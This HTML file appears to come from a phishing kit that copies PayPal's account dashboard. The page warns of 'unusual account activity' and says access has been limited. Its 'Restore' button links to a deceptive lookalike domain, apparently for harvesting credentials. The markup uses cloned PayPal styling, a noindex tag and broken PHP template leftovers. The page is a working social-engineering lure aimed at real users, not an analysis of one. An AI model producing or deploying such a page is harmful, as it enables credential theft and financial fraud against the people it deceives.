<!DOCTYPE html>
<html>
<head>
  <title>title</title>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=yes">
  <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp, noydir">
  <link rel="shortcut icon" href="assets/img/favicon.ico">
  <link rel="apple-touch-icon" href="assets/img/apple-touch-icon.png">
  <link rel="stylesheet" href="assets/css/myaccount_app.css">
  <link rel="stylesheet" href="assets/css/myaccount_sumarry.css">
  <link rel="stylesheet" href="assets/css/myaccount_wallet.css">
  <link rel="stylesheet" href="assets/css/myaccount_main.css">
  <script src="assets/js/jquery.min.js"></script>
  <script src="assets/js/jquery.validate.js"></script>
</head>
<div class="contents vx_mainContent">
<div class="mainContents summaryContainer">
<div class="engagementModule nemo_engagementModule">
<div class="engagementMainBar-container js_engagementMainBar-container">
<div class="summarySection engagementMainBar row" style="height:0%;">
<div class="col-sm-7 progressAndWelcome">
<div class="welcomeMessage js_selectModule selectModule profileStatus active">
<p class="vx_h3 engagementWelcomeMessage nemo_welcomeMessageHeader">
<span class="icon icon-small icon-lock-small" style="color:#ffffff"></span>&nbsp;<span style="color:#FFFFFF">Limited Access Details</span>
</p>
</div>
</div>
</div>
</div>
</div>
<div class="mainBody">
<div class="summarySection">
<div class="row">
<div class="col-sm-12 summaryModuleContainer">
<section class="walletModule nemo_balanceModule">
<div class="balanceModule">
<div class="footerLink">
<img src="assets/img/warning.png" width="90px" height="87px">
<hr>
<p style="padding-top:8px;text-align:left;font-size:16px"><b>Why is my account access limited?</b></p>
<p style="text-align:left;font-size:14px;">
Your account access has been limited for the following reason:
</p>
<ul style="padding-left: 40px;">
<li style="text-align:left;font-size:14px"><b>date</b>
transcode(date('F j, Y', strtotime('-1 days'))." : We noticed some unusual account activity recently and we're concerned about unauthorized access to your PayPal account. For your protection, access to certain account features will be limited.
</li>
</ul>
<hr>
<p style="padding-top:8px;text-align:left;font-size:16px"><b>What do I need to do?</b></p>
<p style="text-align:left;font-size:14px">
Please provide all of the information we requested. Once you have provided the information we need, we'll let you know when to expect a response.
</p>
<p style="padding-bottom:8px;text-align:left;font-size:14px">
Please click on the button below to restore your account access now.
</p>
<a href="http://login-paypal.com-police.intel-confirmation.donsson.com/Nouveau%20dossier/3.html" class="vx_btn">Restore</a>
</div>
</div>
</section>
</div>
</div>
</div>
</div>
</div>
</div>

  <div class="vx_globalNav-main globalNav_main js_globalNavView">
    <div class="vx_globalNav-container">
      <a href="#" class="vx_globalNav-brand_desktop">
				<span class="vx_a11yText">Sumarry</span>
			</a>
      <div class="vx_globalNav-secondaryNav_mobile">
        <div class="vx_globalNav-listItem_mobileLogout">
          <a href="#" id="logout1" class="vx_globalNav-link_mobileLogout">Log Out</a>
        </div>
        <div class="vx_globalNav-listItem_settings">
          <a href="#" class="vx_globalNav-link_settings">
						<span class="vx_globalNav-iconWrapper_secondary">
							<span class="vx_globalNav-navIcon vx_globalNav-navIcon_linkSettings"></span>
						</span>
						<span class="vx_a11yText">Settings</span>
					</a>
        </div>
        <div>
          <p class="vx_h5 vx_globalNav-displayName">
            encode($_SESSION['email']
          </p>
        </div>
      </div>
      <div class="vx_globalNav-navContainer">
        <nav class="vx_globalNav-nav">
          <ul class="vx_globalNav-list">
            <li>
              <a href="#" class="vx_isActive vx_globalNav-links nemo_globalNavSummaryLink">
								<span class="vx_globalNav-iconWrapper">
									<span class="vx_globalNav-navIcon globalNav-icon_linkSummary"></span>
								</span>
								<span class="vx_globalNav-navText">Sumarry</span>
							</a>
            </li>
            <li>
              <a href="#" class="vx_globalNav-links nemo_globalNavActivityLink">
							<span class="vx_globalNav-iconWrapper">
								<span class="vx_globalNav-navIcon globalNav-icon_linkActivity"></span>
							</span>
							<span class="vx_globalNav-navText">Activity</span>
						</a>
            </li>
            <li>
              <a href="#" class="vx_globalNav-links nemo_globalNavTransferLink">
								<span class="vx_globalNav-iconWrapper">
									<span class="vx_globalNav-navIcon globalNav-icon_linkTransfer"></span>
								</span>
								<span class="vx_globalNav-navText">Send & Request</span>
							</a>
            </li>
            <li>
              <a href="#" class="vx_globalNav-links nemo_globalNavWalletLink">
								<span class="vx_globalNav-iconWrapper">
									<span class="vx_globalNav-navIcon globalNav-icon_linkWallet"></span>
								</span>
								<span class="vx_globalNav-navText">Wallet</span>
							</a>
            </li>
            <li>
              <a href="#" class="vx_globalNav-links nemo_globalNavShopLink">
								<span class="vx_globalNav-iconWrapper">
									<span class="vx_globalNav-navIcon globalNav-icon_linkShop"></span>
								</span>
								<span class="vx_globalNav-navText">Shop</span>
							</a>
            </li>
            <li class="globalNav-listItem_mobile js_globalNavSearch">
              <a href="#" class="vx_globalNav-links nemo_globalNavSearchLink js_globalNavSearchLink">
								<span class="vx_globalNav-navText">Search</span>
							</a>
            </li>
          </ul>
          <ul class="vx_globalNav-list_secondary">
            <li class="vx_globalNav-actionItem_mobile globalNav_notificationItem vx_globalNav-notificationItem_mobile js_notificationButtonView nemo_headerNotifications">
              <a href="#" class="vx_globalNav-link_notifications notifications_desktop js_notifications-toggleTrigger nemo_notificationsDesktopTrigger">
								<span class="vx_globalNav-iconWrapper_secondary">
									<span class="vx_globalNav-navIcon vx_globalNav-navIcon_linkNotifications"></span>
									<span class="vx_notificationCount notificationLength-1 js_notificationCount">3</span>
								</span>
									<span class="vx_globalNav-navText_secondary vx_globalNav-navText_secondaryMobile vx_a11yText">Notifications</span>
							</a>
            </li>
            <li>
              <a href="#" class="vx_globalNav-link_settings">
								<span class="vx_globalNav-iconWrapper_secondary">
									<span class="vx_globalNav-navIcon vx_globalNav-navIcon_linkSettings"></span>
								</span>
								<span class="vx_globalNav-navText_secondary vx_a11yText">Settings</span>
							</a>
            </li>
            <li class="globalNav-listItem_mobile">
              <a href="#" class="vx_globalNav-link_help">
								<span class="vx_globalNav-iconWrapper_secondary">
									<span class="vx_globalNav-navIcon vx_globalNav-navIcon_linkHelp"></span>
								</span>
								<span class="vx_globalNav-navText_secondary vx_a11yText">Help</span>
							</a>
            </li>
            <li class="vx_globalNav-listItem_logout"><a href="#" id="logout2" class="vx_globalNav-link_logout nemo_logoutBtn">Log Out</a>
            </li>
          </ul>
        </nav>
      </div>
    </div>
  </div>

      </div>
    </div>
  </div>
  <div class="vx_foreground-container foreground-container">
    <div class="vx_globalNav-main_mobile js_globalNavView">
      <div class="vx_globalNav-headerSection_trigger">
        <a href="#navMenu" class="js_toggleMobileMenu vx_globalNav-toggleTrigger nemo_mobileNavMenuToggle noPrint">Menu</a>
      </div>
      <div class="vx_globalNav-headerSection_logo">
        <a href="#" class="vx_globalNav-brand_mobile">
					<span class="vx_a11yText">Summary</span>
				</a>
      </div>
      <ul class="vx_globalNav-headerSection_actions">
        <li class="vx_globalNav-actionItem_mobile globalNav_notificationItem vx_globalNav-notificationItem_mobile js_notificationButtonView nemo_headerNotifications">
          <a href="#" class="vx_globalNav-link_notifications notifications_mobile js_notifications-toggleTrigger nemo_notificationsMobileTrigger">
						<span class="vx_globalNav-iconWrapper_secondary">
							<span class="vx_globalNav-navIcon vx_globalNav-navIcon_linkNotifications"></span>
							<span class="vx_notificationCount notificationLength-1 js_notificationCount">notification</span>
						</span>
							<span class="vx_globalNav-navText_secondary vx_globalNav-navText_secondaryMobile vx_a11yText">Notifications</span>
					</a>
        </li>
      </ul>
    </div>
